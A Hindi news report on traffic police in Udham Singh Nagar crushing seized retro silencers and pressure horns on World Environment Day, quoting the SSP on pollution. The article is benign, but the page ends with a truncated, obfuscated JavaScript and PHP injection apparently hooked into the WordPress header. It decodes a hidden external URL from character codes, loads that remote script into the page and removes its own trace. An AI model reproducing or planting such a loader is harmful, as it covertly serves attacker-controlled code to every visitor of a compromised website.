Saturday, July 27, 2024
spot_img

विश्व पर्यावरण दिवस पर पुलिस ने क्या किया एसा जो मिला सबक।

यातायात पुलिस ने सोमवार को जब्त किये गये रेट्रो साइलेंसरों और प्रेशर हार्नों पर बुलडोजर चलाकर पर्यावरण संरक्षण का संदेश दिया।  इस मौके पर वरिष्ठ पुलिस अधीक्षक ने कहा कि वाहनों से होने वाले ध्वनि और वायु प्रदूषण को रोकने के लिए पुलिस इस अभियान को जारी रखेगी। नियमों के विरुद्ध जिन वाहनों में प्रेशर हॉर्न और रेट्रो साइलेंसर लगे होंगे उन्हें सीज किया जायेगा। पर्यावरण दिवस के मौके पर यातायात पुलिस ने इस कार्यवाही को अंजाम दिया।  इस दौरान पिछले कुछ दिनों में जब्त किये गये रेट्रो साइलेंसर और प्रेशर हार्नों पर रोड रोलर चलाकर उन्हें निस्तारित किया गया। 

इस मौके पर वरिष्ठ पुलिस अधीक्षक मंजूनाथ टिसी ने कहा कि उधम सिंह नगर जनपद कृषि और वन भूमि वाला जनपद है। उन्होंने कहा कि वन है तो हम हैं और पर्यावरण की सुरक्षा हम सबकी जिम्मेवारी है। इसीलिए पर्यावरण संरक्षण के उद्देश्य से पुलिस पिछले करीब एक माह से अभियान चला रही थी जिसमें बाइकों पर लगे सैकड़ों रेट्रो साइलेंसर और प्रेशर हार्नों को जब्त किया गया था। जिन्हें आज बुल्डोजर चलाकर नष्ट किया गया है। एसएसपी ने कहा कि रेट्रो साइलेंसर और प्रेशर हार्नों से जहां प्रदूषण बढ़ता है वहीं इससे पर्यावरण को भी खतरा है। एसएसपी ने कहा कि पुलिस द्वारा चलाया गया यह अभियान मात्र सांकेतिक नहीं है बल्कि यह पर्यावरण संरक्षण के लिए एक संदेश है। उन्होंने का कि कंपनी से जो साइलेंसर वाहनों में आते है। उनके अलावा तेज आवाज वाले कोई भी साइलेंसर लगा हुआ पाया गया तो भविष्य में वाहन सीज करने के साथ साथ वाहन के ध्वस्तीकरण की कार्रवाई भी की जायेगी। एसएसपी ने कहा कि आज हम आधुनिकता की ओर बढ़ रहे हैं तकनीकी युग में मशीनों और वाहनों का उपयोग करना पड़ता है लेकिन इसकी एक सीमा होती है। उन्होंने कहा कि प्रदूषण को लेकर जो नियम बनाये गये हैं उनका सभी पालन करें। अगर सभी लोग पर्यावरण को सुरक्षित रखने के लिए थोड़ा थोड़ा प्रयास करेंगे तभी हम आने वाली पीढ़ियों को सुरक्षित रख पायेंगे। इस दौरान एसपी क्राइम चन्द्रशेखर घोडके, यातायात निरीक्षक विजय विक्रम,एसआई सतपाल पटवाल, टीएसआई यशवंत पाल, एएसआई मनोज कार्की, सीपीयू हेड कांस्टेबल दीपक भट्ट,जितेन्द्र तिवारी, रोहित चौधरी, नंदन गोस्वामी, मनोज रावत,रवि नेगी, मनोज कुमार आदि भी मौजूद रहे

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>